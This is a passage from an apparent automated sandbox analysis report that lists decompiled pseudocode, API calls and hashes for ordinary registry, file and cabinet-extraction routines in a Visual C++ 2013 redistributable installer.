				if( *((intOrPtr*)(_t74 + 0x490)) != 0) {
					E012B01E8(_t30);
				}
				_t31 =  *(_t74 + 0x3d4);
				if(_t31 != 0) {
					CloseHandle(_t31);
					 *(_t74 + 0x3d4) =  *(_t74 + 0x3d4) & 0x00000000;
				}
				DeleteCriticalSection(_t74 + 0xd0);
				E0128B724(_t74 + 0xb8);
				E0128B6F2(_t70, DeleteCriticalSection, _t74 + 0x2e8);
				E01288BBF(_t74, _t74 + 0x88);
				E01287370(_t74, _t74 + 0xb0);
				E0128536E(_t70, DeleteCriticalSection, _t74 + 0xf8);
				E01284C56(_t74, _t74 + 0x2b0);
				E01283EE7(_t69, _t70, _t74 + 0x2b8);
				E01283C48(_t70, _t74, _t74 + 0x2a8);
				E01281F8F(_t74 + 0x48);
				_t51 =  *((intOrPtr*)(_t74 + 0x40));
				if( *((intOrPtr*)(_t74 + 0x40)) != 0) {
					E012B01E8(_t51);
				}
				_t52 =  *((intOrPtr*)(_t74 + 0x28));
				if( *((intOrPtr*)(_t74 + 0x28)) != 0) {
					E012B01E8(_t52);
				}
				_t53 =  *((intOrPtr*)(_t74 + 0x3f8));
				if( *((intOrPtr*)(_t74 + 0x3f8)) != 0) {
					E012B01E8(_t53);
				}
				_t54 =  *((intOrPtr*)(_t74 + 0x3f4));
				if( *((intOrPtr*)(_t74 + 0x3f4)) != 0) {
					E012B01E8(_t54);
				}
				_t55 =  *((intOrPtr*)(_t74 + 0x3f0));
				if( *((intOrPtr*)(_t74 + 0x3f0)) != 0) {
					E012B01E8(_t55);
				}
				_t56 =  *((intOrPtr*)(_t74 + 0x3e8));
				if( *((intOrPtr*)(_t74 + 0x3e8)) != 0) {
					E012B01E8(_t56);
				}
				_t57 =  *(_t74 + 0x48c);
				if(_t57 != 0xffffffff) {
					TlsFree(_t57); // executed
				}
				DeleteCriticalSection(_t74);
				return E012A7E30(_t74, 0, 0x4d0);
			}

0x012810dc
0x012810dc
0x012810dc
0x012810dc
0x012810e4
0x012810e7
0x012810e7
0x012810f3
0x012810ff
0x01281104
0x0128110c
0x0128110f
0x0128110f
0x01281114
0x0128111d
0x01281120
0x01281126
0x01281126
0x0128113a
0x01281143
0x0128114f
0x0128115b
0x01281167
0x01281173
0x0128117f
0x0128118b
0x01281197
0x012811a0
0x012811a5
0x012811aa
0x012811ad
0x012811ad
0x012811b2
0x012811b7
0x012811ba
0x012811ba
0x012811bf
0x012811c7
0x012811ca
0x012811ca
0x012811cf
0x012811d7
0x012811da
0x012811da
0x012811df
0x012811e7
0x012811ea
0x012811ea
0x012811ef
0x012811f7
0x012811fa
0x012811fa
0x012811ff
0x01281208
0x0128120b
0x0128120b
0x01281212
0x01281225

APIs

CloseHandle.KERNEL32(?,00000000,?,?,01281ED4,?,?,?,?,?), ref: 01281120
DeleteCriticalSection.KERNEL32(?,00000000,?,?,01281ED4,?,?,?,?,?), ref: 0128113A
TlsFree.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0128120B
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01281212
_memset.LIBCMT ref: 0128121C

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CriticalDeleteSection$CloseFreeHandle_memset
String ID:
API String ID: 3611737199-0
Opcode ID: 13a4cf1eba341f475961bf9c5babc3429eee8c23cf97ad1e3c8f2c16ff110cae
Instruction ID: 15958935b2bc8d757f12214ef01273a48f07e49804215812e9b08d9c0d8cdf7d
Opcode Fuzzy Hash: 13a4cf1eba341f475961bf9c5babc3429eee8c23cf97ad1e3c8f2c16ff110cae
Instruction Fuzzy Hash: 7231C8B1A217036BDA65FBB9D888FAF73ECAF15640F444919B659D3080DB74E2068B24

Uniqueness

Uniqueness Score: -1.00%

Function 012B3336 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 153
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E012B3336(void* __edi, void* _a4, signed int _a8, intOrPtr* _a12, long* _a16) {
				int* _v8;
				int _v12;
				int _v16;
				char _v20;
				int* _v24;
				long _t54;
				signed int _t57;
				signed int _t65;
				WCHAR* _t77;
				signed int _t78;
				int* _t79;
				unsigned int _t82;
				long _t83;
				void* _t85;
				long* _t88;

				_t85 = __edi;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_v8 = 0;
				_t54 = RegQueryValueExW(_a4, _a8, 0,  &_v16, 0,  &_v12); // executed
				_t82 = _v12;
				if(_t82 <= 0) {
					L3:
					_push(_t85);
					_t78 = _t54;
					if(_t54 > 0) {
						_t78 = _t78 & 0x0000ffff | 0x80070000;
					}
					if(_t78 != 0x80070002) {
						__eflags = _t54;
						if(__eflags == 0) {
							_t54 = _v24;
							_t83 = _t82 >> 1;
							__eflags = _t83 - _t54;
							if(_t83 == _t54) {
								__eflags = _v16 - 7;
								if(_v16 == 7) {
									_t90 = 0;
									__eflags = _t54 - 2;
									if(_t54 >= 2) {
										_t79 = _v8;
										__eflags = 0 -  *((intOrPtr*)(_t79 + _t54 * 2 - 2));
										if(0 !=  *((intOrPtr*)(_t79 + _t54 * 2 - 2))) {
											L23:
											_t90 = 0x80070057;
										} else {
											__eflags = 0 -  *((intOrPtr*)(_t79 + _t54 * 2 - 4));
											if(0 ==  *((intOrPtr*)(_t79 + _t54 * 2 - 4))) {
												_t57 = 0;
												__eflags = _t83;
												if(__eflags > 0) {
													do {
														__eflags = 0 -  *((intOrPtr*)(_t79 + _t57 * 2));
														if(0 ==  *((intOrPtr*)(_t79 + _t57 * 2))) {
															_t32 =  &_v20;
															 *_t32 = _v20 + 1;
															__eflags =  *_t32;
														}
														_t57 = _t57 + 1;
														__eflags = _t57 - _t83;
													} while (__eflags < 0);
												}
												_t88 = _a16;
												 *_t88 = _v20 - 1;
												_t90 = E012B23C6(_t79, __eflags, _a12, _v20 - 1, 4, 0);
												__eflags = _t90;
												if(_t90 >= 0) {
													_a8 = _a8 & 0x00000000;
													__eflags =  *_t88;
													_t77 = _v8;
													if( *_t88 > 0) {
														while(1) {
															_t90 = E012B1171(_a8, _t83,  *_a12 + _a8 * 4, _t77, 0);
															__eflags = _t90;
															if(_t90 < 0) {
																goto L32;
															}
															_t65 = lstrlenW(_t77);
															_a8 = _a8 + 1;
															_t77 = _t77 + 2 + _t65 * 2;
															__eflags = _a8 -  *_t88;
															if(_a8 <  *_t88) {
																continue;
															}
															goto L32;
														}
													}
												}
											} else {
												goto L23;
											}
										}
									} else {
										 *_a12 = 0;
										 *_a16 = 0;
									}
								} else {
									_t90 = 0x8007070c;
									_push(0x8007070c);
									_push(0x217);
									goto L18;
								}
							} else {
								_t90 = 0x8000ffff;
							}
						} else {
							if(__eflags > 0) {
								_t90 = 0x0000ffff & _t54 | 0x80070000;
								__eflags = _t90;
							} else {
								_t90 = _t54;
							}
							__eflags = _t90;
							if(_t90 >= 0) {
								_t90 = 0x80004005;
							}
							_push(_t90);
							_push(0x20c);
							L18:
							_push("regutil.cpp");
							E012B294E(_t54);
						}
					} else {
						_t90 = 0x80070002;
					}
					L32:
				} else {
					_v24 = _t82 >> 1;
					_t90 = E012B00D8( &_v8, _t82 >> 1);
					if(_t90 >= 0) {
						_t54 = RegQueryValueExW(_a4, _a8, 0,  &_v16, _v8,  &_v12); // executed
						_t82 = _v12;
						goto L3;
					}
				}
				if(_v8 != 0) {
					E012B01E8(_v8);
				}
				return _t90;
			}

0x012b3336
0x012b334d
0x012b3353
0x012b3356
0x012b3359
0x012b335c
0x012b335f
0x012b3365
0x012b336a
0x012b33a0
0x012b33a0
0x012b33ab
0x012b33af
0x012b33b3
0x012b33b3
0x012b33bc
0x012b33c7
0x012b33c9
0x012b33e6
0x012b33e9
0x012b33eb
0x012b33ed
0x012b33f9
0x012b33fd
0x012b3419
0x012b341b
0x012b341e
0x012b342f
0x012b3432
0x012b3437
0x012b3442
0x012b3442
0x012b3439
0x012b343b
0x012b3440
0x012b3449
0x012b344b
0x012b344d
0x012b344f
0x012b3451
0x012b3455
0x012b3457
0x012b3457
0x012b3457
0x012b3457
0x012b345a
0x012b345b
0x012b345b
0x012b344f
0x012b3462
0x012b346d
0x012b3474
0x012b3476
0x012b3478
0x012b347a
0x012b347e
0x012b3481
0x012b3484
0x012b3486
0x012b349a
0x012b349c
0x012b349e
0x00000000
0x00000000
0x012b34a1
0x012b34a7
0x012b34aa
0x012b34b1
0x012b34b3
0x00000000
0x00000000
0x00000000
0x012b34b3
0x012b3486
0x012b3484
0x00000000
0x00000000
0x00000000
0x012b3440
0x012b3420
0x012b3423
0x012b3428
0x012b3428
0x012b33ff
0x012b33ff
0x012b3404
0x012b3405
0x00000000
0x012b3405
0x012b33ef
0x012b33ef
0x012b33ef
0x012b33cb
0x012b33cb
0x012b33d3
0x012b33d3
0x012b33cd
0x012b33cd
0x012b33cd
0x012b33d5
0x012b33d7
0x012b33d9
0x012b33d9
0x012b33de
0x012b33df
0x012b340a
0x012b340a
0x012b340f
0x012b340f
0x012b33be
0x012b33be
0x012b33be
0x012b34b5
0x012b336c
0x012b3373
0x012b337b
0x012b337f
0x012b3397
0x012b339d
0x00000000
0x012b339d
0x012b337f
0x012b34ba
0x012b34bf
0x012b34bf
0x012b34c9

APIs

RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 012B335F
RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,?), ref: 012B3397
lstrlenW.KERNEL32(00000000,?,00000000,00000000,?,?,00000004,00000000,?,?,?,?,?,00020019,00000000,?), ref: 012B34A1

Strings

regutil.cpp, xrefs: 012B340A

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: QueryValue$lstrlen
String ID: regutil.cpp
API String ID: 3790715954-955085611
Opcode ID: c488b0724f5f5114810428d0d974127c1560fc4aa70b3ce24e6ee6317f18290c
Instruction ID: 122b37443440f107c7b94d527fc53ce36ae94a8d5c71366ab3f3e9e821550119
Opcode Fuzzy Hash: c488b0724f5f5114810428d0d974127c1560fc4aa70b3ce24e6ee6317f18290c
Instruction Fuzzy Hash: A551B47A92011AEBDB22DF98C8C49FEB7B5FB04390F144579EF01A7201D6789D448B90

Uniqueness

Uniqueness Score: -1.00%

Function 012B37F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115
registryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E012B37F2(void* __ecx, void* _a4, int _a8, short** _a12) {
				int _v8;
				int _t20;
				signed int _t24;
				signed int _t35;
				short** _t42;
				signed int _t53;

				_t42 = _a12;
				_v8 = 0;
				if(_t42 == 0) {
					L4:
					_t20 = 2;
					_v8 = _t20;
					_t35 = E012B00D8(_t42, _t20);
					if(_t35 >= 0) {
						goto L5;
					}
				} else {
					_t32 =  *_t42;
					if( *_t42 == 0) {
						goto L4;
					} else {
						_t35 = E012B018E(_t32,  &_v8);
						if(_t35 >= 0) {
							if(_v8 >= 2) {
								L5:
								_t24 = RegEnumKeyExW(_a4, _a8,  *_t42,  &_v8, 0, 0, 0, 0); // executed
								if(_t24 != 0xea) {
									__eflags = _t24 - 0x103;
									if(_t24 != 0x103) {
										goto L14;
									} else {
										_t35 = 0x80070103;
									}
								} else {
									_t24 = RegQueryInfoKeyW(_a4, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0, 0, 0);
									_t53 = _t24;
									if(_t53 == 0) {
										_v8 = _v8 + 1;
										_t35 = E012B00D8(_t42, _v8);
										__eflags = _t35;
										if(_t35 >= 0) {
											_t24 = RegEnumKeyExW(_a4, _a8,  *_t42,  &_v8, 0, 0, 0, 0); // executed
											L14:
											__eflags = _t24;
											if(__eflags == 0) {
												__eflags = 0;
												( *_t42)[_v8] = 0;
											} else {
												if(__eflags > 0) {
													_t24 = _t24 & 0x0000ffff | 0x80070000;
													__eflags = _t24;
												}
												_t35 = _t24;
												__eflags = _t35;
												if(_t35 >= 0) {
													_t35 = 0x80004005;
												}
												_push(_t35);
												_push(0x13b);
												goto L20;
											}
										}
									} else {
										if(_t53 > 0) {
											_t24 = _t24 & 0x0000ffff | 0x80070000;
										}
										_t35 = _t24;
										if(_t35 >= 0) {
											_t35 = 0x80004005;
										}
										_push(_t35);
										_push(0x12f);
										L20:
										_push("regutil.cpp");
										E012B294E(_t24);
									}
								}
							} else {
								goto L4;
							}
						}
					}
				}
				return _t35;
			}

0x012b37f9
0x012b37fe
0x012b3803
0x012b3825
0x012b3827
0x012b382a
0x012b3832
0x012b3836
0x00000000
0x00000000
0x012b3805
0x012b3805
0x012b3809
0x00000000
0x012b380b
0x012b3815
0x012b3819
0x012b3823
0x012b383c
0x012b384c
0x012b3857
0x012b38ec
0x012b38f1
0x00000000
0x012b38f3
0x012b38f3
0x012b38f3
0x012b385d
0x012b386e
0x012b3874
0x012b3876
0x012b3897
0x012b38a3
0x012b38a5
0x012b38a7
0x012b38b9
0x012b38bf
0x012b38bf
0x012b38c1
0x012b38ff
0x012b3901
0x012b38c3
0x012b38c3
0x012b38ca
0x012b38ca
0x012b38ca
0x012b38cf
0x012b38d1
0x012b38d3
0x012b38d5
0x012b38d5
0x012b38da
0x012b38db
0x00000000
0x012b38db
0x012b38c1
0x012b3878
0x012b3878
0x012b387f
0x012b387f
0x012b3884
0x012b3888
0x012b388a
0x012b388a
0x012b388f
0x012b3890
0x012b38e0
0x012b38e0
0x012b38e5
0x012b38e5
0x012b3876
0x00000000
0x00000000
0x00000000
0x012b3823
0x012b3819
0x012b3809
0x012b390b

APIs

RegEnumKeyExW.KERNELBASE(?,?,?,00000002,00000000,00000000,00000000,00000000), ref: 012B384C
RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,012A0DFE,?), ref: 012B386E
RegEnumKeyExW.KERNELBASE ref: 012B38B9

Strings

regutil.cpp, xrefs: 012B38E0

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Enum$InfoQuery
String ID: regutil.cpp
API String ID: 73471667-955085611
Opcode ID: b01d25a215df88d03356c798d319a6559f9d1a10e2895fe2bc483727922f1c11
Instruction ID: c1c289aa10aa635e83e6a6a81e3bc5cec8d2b582e3fcdd641eb9dea3603d56ea
Opcode Fuzzy Hash: b01d25a215df88d03356c798d319a6559f9d1a10e2895fe2bc483727922f1c11
Instruction Fuzzy Hash: 2031A171A2212ABBDB21DA94CCC8DFFBEBDFF09790F204425F605D6000D2B59A5097E1

Uniqueness

Uniqueness Score: -1.00%

Function 012A0CDA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73
registryCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E012A0CDA(void* __ebx, void* __ecx, void* __edx, intOrPtr* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				signed int _t24;
				signed int _t33;
				void* _t40;
				signed int _t43;

				_t40 = __edx;
				_t37 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t21 = E012B378B(_a8, __ebx, 0x20019,  &_v8); // executed
				if(_t21 >= 0) {
					_t24 = E012A0896(_a12, _t40, _v8,  &_v12); // executed
					__eflags = _t24;
					if(_t24 < 0) {
						L10:
						_t43 = 0x80070490;
					} else {
						__eflags = _v12;
						if(__eflags == 0) {
							goto L10;
						} else {
							_t43 = E012B23C6(_t37, __eflags, __esi,  *(__esi + 4) + 1, 0xf8, 5);
							__eflags = _t43;
							if(_t43 >= 0) {
								_t33 = E012A06BC(_t37, _t40, __ebx, _v8, _a4, _v12,  *(__esi + 4) * 0xf8 +  *__esi); // executed
								_t43 = _t33;
								__eflags = _t43;
								if(_t43 >= 0) {
									 *(__esi + 4) =  *(__esi + 4) + 1;
								} else {
									_push(__ebx);
									_push("Failed to initialize package from related bundle id: %ls");
									goto L8;
								}
							} else {
								_push("Failed to ensure there is space for related bundles.");
								_push(_t43);
								E012AFA86();
							}
						}
					}
				} else {
					_push(__ebx);
					_push("Failed to open uninstall key for potential related bundle: %ls");
					L8:
					_push(_t43);
					E012AFA86();
				}
				if(_v8 != 0) {
					RegCloseKey(_v8); // executed
				}
				return _t43;
			}

0x012a0cda
0x012a0cda
0x012a0cdd
0x012a0cde
0x012a0cdf
0x012a0ce3
0x012a0cf5
0x012a0cfe
0x012a0d12
0x012a0d17
0x012a0d19
0x012a0d7f
0x012a0d7f
0x012a0d1b
0x012a0d1b
0x012a0d1f
0x00000000
0x012a0d21
0x012a0d33
0x012a0d35
0x012a0d37
0x012a0d5e
0x012a0d63
0x012a0d65
0x012a0d67
0x012a0d7a
0x012a0d69
0x012a0d69
0x012a0d6a
0x00000000
0x012a0d6a
0x012a0d39
0x012a0d39
0x012a0d3e
0x012a0d3f
0x012a0d45
0x012a0d37
0x012a0d1f
0x012a0d00
0x012a0d00
0x012a0d01
0x012a0d6f
0x012a0d6f
0x012a0d70
0x012a0d75
0x012a0d88
0x012a0d8d
0x012a0d8d
0x012a0d97

APIs

Part of subcall function 012B378B: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,01291F19,?,00000009,00000000,?,01291BE1,80000002,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,?,00000001), ref: 012B379F

RegCloseKey.KERNELBASE(00000000,00000000,00000000,?,?,00020019,00000000,?,?,?,?,012A0E36,?,?,?), ref: 012A0D8D

Strings

Failed to ensure there is space for related bundles., xrefs: 012A0D39
Failed to open uninstall key for potential related bundle: %ls, xrefs: 012A0D01
Failed to initialize package from related bundle id: %ls, xrefs: 012A0D6A

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseOpen
String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
API String ID: 47109696-1717420724
Opcode ID: 401964370ec78999b859fd1c34b2567660baf7b4860ddfd97d947f01fe98ce99
Instruction ID: 06dee9363b910950cba8a19d1af3662bcdd9dc6c6047d8cae26dcbd2f651270a
Opcode Fuzzy Hash: 401964370ec78999b859fd1c34b2567660baf7b4860ddfd97d947f01fe98ce99
Instruction Fuzzy Hash: 33210277560A06FFEB22DA54CC42FBE7AB8EB50745F600018FA15A6240EB70FE009798

Uniqueness

Uniqueness Score: -1.00%

Function 012A5F23 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E012A5F23(void* __eflags, void* _a4, void* _a8, long _a12) {
				long _v8;
				signed int _t15;
				signed int _t20;
				signed int _t23;
				signed int _t31;
				intOrPtr _t34;

				_t15 =  *0x12d4fd4; // 0x0
				_t34 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t15 * 4)) + 4));
				_t31 = 0;
				_v8 = _v8 & 0;
				E012A5E49(__eflags, _a4, _a12); // executed
				_t20 = ReadFile(_a4, _a8, _a12,  &_v8, 0); // executed
				if(_t20 == 0) {
					_t23 = GetLastError();
					if(_t23 > 0) {
						_t23 = _t23 & 0x0000ffff | 0x80070000;
					}
					_t31 = _t23;
					if(_t31 >= 0) {
						_t31 = 0x80004005;
					}
					E012B294E(_t23, "cabextract.cpp", 0x2cb, _t31);
					_push("Failed to read during cabinet extraction.");
					_push(_t31);
					_t20 = E012AFA86();
				}
				 *(_t34 + 0x30) = _t31;
				if(_t31 >= 0) {
					return _v8;
				} else {
					return _t20 | 0xffffffff;
				}
			}

0x012a5f2e
0x012a5f37
0x012a5f41
0x012a5f46
0x012a5f4c
0x012a5f5f
0x012a5f67
0x012a5f69
0x012a5f71
0x012a5f78
0x012a5f78
0x012a5f7d
0x012a5f81
0x012a5f83
0x012a5f83
0x012a5f93
0x012a5f98
0x012a5f9d
0x012a5f9e
0x012a5fa4
0x012a5fa5
0x012a5fac
0x012a5fb7
0x012a5fae
0x012a5fb2
0x012a5fb2

APIs

Part of subcall function 012A5E49: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,00000000,?,?,012A5F51,?,?), ref: 012A5E6E
Part of subcall function 012A5E49: GetLastError.KERNEL32(?,012A5F51,?,?), ref: 012A5E78

ReadFile.KERNELBASE(?,?,?,?,00000000,?,?), ref: 012A5F5F
GetLastError.KERNEL32 ref: 012A5F69

Strings

cabextract.cpp, xrefs: 012A5F8E
Failed to read during cabinet extraction., xrefs: 012A5F98

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorFileLast$PointerRead
String ID: Failed to read during cabinet extraction.$cabextract.cpp
API String ID: 2170121939-2426083571
Opcode ID: 29cc2492fcd815c25204183c3390db9abb6b5cd85789b9a40359d6c32adb6897
Instruction ID: 75d0b5076b916a6686f7e393581a3a99b8d89ea9b8f36785dd7a4e4190f6b246
Opcode Fuzzy Hash: 29cc2492fcd815c25204183c3390db9abb6b5cd85789b9a40359d6c32adb6897
Instruction Fuzzy Hash: 23010436260206EBCB228F59ED44EAB3BF8EF85760F50012CFA14D7290D731EA019B50

Uniqueness

Uniqueness Score: -1.00%

Function 012B6182 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B6182(void* __ecx, WCHAR* _a4, long _a8, intOrPtr _a12, intOrPtr _a16, void** _a20) {
				void* _t6;
				signed int _t7;
				void** _t10;
				signed int _t11;
				void* _t14;
				signed int _t15;
				void* _t16;

				_t14 = __ecx;
				_t6 = CreateFileW(_a4, 0x40000000, 1, 0, 2, _a8, 0); // executed
				_t16 = _t6;
				if(_t16 != 0xffffffff) {
					_t7 = E012B5783(_t14, _t16, _a12, _a16); // executed
					_t15 = _t7;
					if(_t15 >= 0) {
						_t10 = _a20;
						if(_t10 != 0) {
							 *_t10 = _t16;
							_t16 = _t16 | 0xffffffff;
						}
					}
					if(_t16 != 0xffffffff) {
						FindCloseChangeNotification(_t16); // executed
					}
					L11:
					return _t15;
				}
				_t11 = GetLastError();
				if(_t11 > 0) {
					_t11 = _t11 & 0x0000ffff | 0x80070000;
				}
				_t15 = _t11;
				if(_t15 >= 0) {
					_t15 = 0x80004005;
				}
				E012B294E(_t11, "fileutil.cpp", 0x327, _t15);
				goto L11;
			}

0x012b6182
0x012b619a
0x012b61a0
0x012b61a5
0x012b61df
0x012b61e4
0x012b61e8
0x012b61ea
0x012b61ef
0x012b61f1
0x012b61f3
0x012b61f3
0x012b61ef
0x012b61f9
0x012b61fc
0x012b61fc
0x012b6202
0x012b6207
0x012b6207
0x012b61a7
0x012b61af
0x012b61b6
0x012b61b6
0x012b61bb
0x012b61bf
0x012b61c1
0x012b61c1
0x012b61d1
0x00000000

APIs

CreateFileW.KERNELBASE(E9012BE1,40000000,00000001,00000000,00000002,00000080,00000000,00000000,01287081,?,01285F72,01287081,00000080,E9012BE1,00000000), ref: 012B619A
GetLastError.KERNEL32(?,01285F72,01287081,00000080,E9012BE1,00000000,?,?,01287081,012813BB,?,?,?,?,?,DisplayName), ref: 012B61A7
FindCloseChangeNotification.KERNELBASE(00000000,00000000,01287081,01285F72,?,01285F72,01287081,00000080,E9012BE1,00000000,?,?,01287081,012813BB), ref: 012B61FC

Strings

fileutil.cpp, xrefs: 012B61CC

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ChangeCloseCreateErrorFileFindLastNotification
String ID: fileutil.cpp
API String ID: 4091947256-2967768451
Opcode ID: b44806451760d806653c3f9d331d55ab660d01b2d6697b88577ef679e693dc30
Instruction ID: 4fac38d2b2c9b1015555d63da6ce480ebe23aafe8214e9ba90e604befa7d8d60
Opcode Fuzzy Hash: b44806451760d806653c3f9d331d55ab660d01b2d6697b88577ef679e693dc30
Instruction Fuzzy Hash: 6D01DF322606136BD7221A2D9D89FDA3E65AB817B0F150230FF24AB2D1EA76D81057A0

Uniqueness

Uniqueness Score: -1.00%

Function 012B5E1C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B5E1C(void* __ecx, WCHAR* _a4, intOrPtr _a8) {
				void* _t5;
				signed int _t9;
				void* _t14;
				void* _t16;
				signed int _t18;

				_t14 = __ecx;
				if(_a4 != 0) {
					_t5 = CreateFileW(_a4, 0x80, 1, 0, 3, 0x80, 0); // executed
					_t16 = _t5;
					if(_t16 != 0xffffffff) {
						_t18 = E012B56AA(_t14, _t16, _a8); // executed
						FindCloseChangeNotification(_t16); // executed
					} else {
						_t9 = GetLastError();
						if(_t9 > 0) {
							_t9 = _t9 & 0x0000ffff | 0x80070000;
						}
						_t18 = _t9;
						if(_t18 >= 0) {
							_t18 = 0x80004005;
						}
						E012B294E(_t9, "fileutil.cpp", 0x226, _t18);
					}
				} else {
					_t18 = 0x80070057;
					E012B294E(0x80070057, "fileutil.cpp", 0x221, 0x80070057);
				}
				return _t18;
			}

0x012b5e1c
0x012b5e24
0x012b5e52
0x012b5e58
0x012b5e5d
0x012b5e9a
0x012b5e9c
0x012b5e5f
0x012b5e5f
0x012b5e67
0x012b5e6e
0x012b5e6e
0x012b5e73
0x012b5e77
0x012b5e79
0x012b5e79
0x012b5e89
0x012b5e89
0x012b5e26
0x012b5e36
0x012b5e38
0x012b5e38
0x012b5ea7

APIs

CreateFileW.KERNELBASE(00000000,00000080,00000001,00000000,00000003,00000080,00000000,?,00000000,?,012A0751,00000000,?,?,BundleCachePath,00000000), ref: 012B5E52
GetLastError.KERNEL32(?,012A0751,00000000,?,?,BundleCachePath,00000000,?,BundleVersion,?,?,EngineVersion,?,00000000), ref: 012B5E5F

Strings

fileutil.cpp, xrefs: 012B5E31, 012B5E84

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
